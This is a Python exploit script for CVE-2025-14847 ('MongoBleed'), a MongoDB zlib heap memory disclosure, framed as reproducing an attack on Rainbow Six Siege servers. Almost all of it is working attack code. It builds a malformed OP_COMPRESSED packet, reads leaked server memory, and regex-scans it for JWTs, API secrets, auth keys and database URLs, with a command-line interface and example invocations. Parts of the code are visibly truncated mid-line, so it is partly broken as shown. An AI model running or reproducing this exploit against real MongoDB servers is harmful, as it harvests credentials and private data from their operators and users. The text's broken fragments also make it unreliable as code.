#!/usr/bin/env python3 """ CVE-2025-14847 (MongoBleed) - R6 Attack Vector PoC Author: Security Research Team License: MIT (Educational Use Only) This tool demonstrates heap memory disclosure in MongoDB's zlib compression layer. Simulates the suspected attack vector used against Rainbow Six Siege infrastructure. """ import socket import struct import zlib import random import sys import argparse import time import re import json import base64 from typing import Dict, List, Tuple, Optional from dataclasses import dataclass, asdict from datetime import datetime @dataclass class LeakResult: """Container for memory leak analysis results""" timestamp: str target: str bytes_leaked: int patterns_found: Dict[str, List[str]] success: bool error: Optional[str] = None class R6Exploit: """ CVE-2025-14847 Exploitation Framework Target: MongoDB with zlib compression enabled """ # Pattern signatures for R6-specific artifacts PATTERNS = { "JWT_Token": rb"eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+", "R6_Server_Auth": rb"R6S_SERVER_AUTH_[A-Z0-9]{32,}", "R6_Analytics_Key": rb"R6S_ANALYTICS_KEY_[a-z0-9]{30,}", "R6_Telemetry_Key": rb"R6S_TELEMETRY_KEY_[a-z0-9]{30,}", "Ubisoft_API_Secret": rb"UPLAY_API_SECRET_[a-z0-9]{30,}", "UUID": rb"[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}", "MongoDB_URL": rb"mongodb://[a-zA-Z0-9_\-:@./]+", "Internal_IP": rb"10\.\d{1,3}\.\d{1,3}\.\d{1,3}", "Pro_Team": rb"(W7M Esports|FaZe Clan|Team Liquid|G2 Esports|FURIA)", "Match_ID": rb"match_uuid_[a-f0-9\-]{36,}", } def __init__(self, target_ip: str, target_port: int = 27017, leak_size: int = 1048576, timeout: int = 10): self.target_ip = target_ip self.target_port = target_port self.leak_size = leak_size self.timeout = timeout self.sock = None def _connect(self) -> bool: """Establish connection with exponential backoff retry""" max_retries = 3 for attempt in range(max_retries): try: self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.sock.connect((self.target_ip, self.target_port)) return True except (socket.timeout, ConnectionRefusedError) as e: if attempt < max_retries - 1: wait_time = 2 ** attempt print(f"[!] Connection attempt {attempt + 1} failed, retrying in {wait_time}s...") time.sleep(wait_time) else: print(f"[-] Connection failed after {max_retries} attempts: {e}") return False except Exception as e: print(f"[-] Unexpected connection error: {e}") return False def _close(self): """Safely close socket connection""" if self.sock: try: self.sock.close() except: pass self.sock = None def build_malformed_packet(self) -> Tuple[bytes, int]: """ Construct malicious OP_COMPRESSED packet Vulnerability: MongoDB allocates buffer based on uncompressedSize without validating it matches actual decompressed data length. """ # Base payload: isMaster query (pre-auth check) bson_payload = b'\x13\x00\x00\x00\x10isMaster\x00\x01\x00\x00\x00\x00' op_query_header = struct.pack(' bool: """ Non-intrusive probe to detect MongoDB and version """ print(f"\n{'='*60}") print(f"[*] PROBE MODE: {self.target_ip}:{self.target_port}") print(f"{'='*60}\n") if not self._connect(): return False try: # Send standard uncompressed isMaster op_query = struct.pack(' Optional[LeakResult]: """ Execute memory leak attack """ print(f"\n{'='*60}") print(f"[!] EXPLOIT MODE: {self.target_ip}:{self.target_port}") print(f"{'='*60}\n") if not self._connect(): return None try: # Send malicious packet packet, req_id = self.build_malformed_packet() print(f"[*] Sending malicious OP_COMPRESSED (ID: {req_id})...") self.sock.sendall(packet) # Receive response header resp_header = self.sock.recv(16) if not resp_header or len(resp_header) < 16: print("[-] No response. Target may be patched or crashed.") return LeakResult( timestamp=datetime.now().isoformat(), target=f"{self.target_ip}:{self.target_port}", bytes_leaked=0, patterns_found={}, success=False, error="No server response" ) resp_len, resp_id, resp_to, resp_opcode = struct.unpack(' 0: try: chunk_size = min(8192, remaining) chunk = self.sock.recv(chunk_size) if not chunk: break leaked_data += chunk remaining -= len(chunk) # Progress indicator if len(leaked_data) % 32768 == 0: print(".", end='', flush=True) except socket.timeout: print("\n[!] Timeout during reception") break print(f"\n[+] Captured {len(leaked_data)} bytes") # Analyze leaked memory patterns_found = self._analyze_memory(leaked_data) # Save raw dump if requested if output_file: with open(output_file, "wb") as f: f.write(leaked_data) print(f"[+] Raw dump saved: {output_file}") result = LeakResult( timestamp=datetime.now().isoformat(), target=f"{self.target_ip}:{self.target_port}", bytes_leaked=len(leaked_data), patterns_found=patterns_found, success=True ) return result except ConnectionResetError: print("[-] Connection reset! Leak size may be too large.") print(" Try reducing --leak-size (e.g., 65536)") return None except Exception as e: print(f"[-] Exploit error: {e}") return None finally: self._close() def _analyze_memory(self, data: bytes) -> Dict[str, List[str]]: """ Heuristic pattern matching for R6 artifacts """ print(f"\n{'-'*60}") print("[*] ANALYZING LEAKED MEMORY") print(f"{'-'*60}\n") # Strip null bytes for cleaner regex matching clean_data = data.replace(b'\x00', b' ') results = {} total_findings = 0 for pattern_name, pattern_regex in self.PATTERNS.items(): matches = re.findall(pattern_regex, clean_data) if matches: unique_matches = list(set(matches)) results[pattern_name] = [ m.decode('utf-8', errors='ignore') for m in unique_matches ] print(f"[+] {pattern_name}: {len(unique_matches)} unique") for match in unique_matches[:3]: # Show max 3 samples display = match.decode('utf-8', errors='ignore') if isinstance(match, bytes) else match if len(display) > 80: display = display[:77] + "..." print(f" └─ {display}") if len(unique_matches) > 3: print(f" └─ ... and {len(unique_matches) - 3} more") total_findings += len(unique_matches) print() if total_findings == 0: print("[-] No high-value patterns detected") print("[*] Dumping ASCII preview (last 512 bytes):") preview = "".join(chr(b) if 32 <= b <= 126 else "." for b in data[-512:]) print(f" {preview[:80]}") if len(preview) > 80: print(f" {preview[80:160]}") print(f"{'-'*60}\n") print(f"[*] Total artifacts found: {total_findings}") return results def generate_report(self, result: LeakResult, output_file: str): """Generate JSON report of findings""" report = asdict(result) report['exploit_config'] = { 'leak_size': self.leak_size, 'timeout': self.timeout, 'cve': 'CVE-2025-14847' } with open(output_file, 'w') as f: json.dump(report, f, indent=2) print(f"[+] JSON report saved: {output_file}") def main(): banner = """ ╔══════════════════════════════════════════════════════════╗ ║ CVE-2025-14847: MongoBleed R6 Attack Vector PoC ║ ║ Target: MongoDB Zlib Compression Memory Disclosure ║ ║ WARNING: Authorized Testing Only ║ ╚══════════════════════════════════════════════════════════╝ """ print(banner) parser = argparse.ArgumentParser( description="MongoDB CVE-2025-14847 Exploitation Tool", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: # Check if target is vulnerable %(prog)s --target 127.0.0.1 --check # Leak 64KB of memory %(prog)s --target 127.0.0.1 --leak-size 65536 --out r6_leak.bin # Full attack with JSON report %(prog)s --target 10.0.0.5 --leak-size 1048576 --out dump.bin --report findings.json """ ) parser.add_argument("--target", required=True, help="Target MongoDB IP") parser.add_argument("--port", type=int, default=27017, help="Target port (default: 27017)") parser.add_argument("--leak-size", type=int, default=1048576, help="Fake uncompressed size in bytes (default: 1MB)") parser.add_argument("--timeout", type=int, default=10, help="Socket timeout (default: 10s)") parser.add_argument("--check", action="store_true", help="Probe mode: detect vulnerability") parser.add_argument("--out", help="Save raw memory dump to file") parser.add_argument("--report", help="Generate JSON report of findings") args = parser.parse_args() # Input validation if args.leak_size < 1024 or args.leak_size > 10485760: # 1KB to 10MB print("[-] Error: leak-size must be between 1024 and 10485760 bytes") sys.exit(1) exploit = R6Exploit( target_ip=args.target, target_port=args.port, leak_size=args.leak_size, timeout=args.timeout ) if args.check: # Probe mode is_vulnerable = exploit.check_vulnerability() sys.exit(0 if is_vulnerable else 1) else: # Exploit mode result = exploit.exploit(output_file=args.out) if result and result.success: if args.report: exploit.generate_report(result, args.report) # Exit with success if patterns found sys.exit(0 if result.patterns_found else 2) else: sys.exit(1) if __name__ == "__main__": main()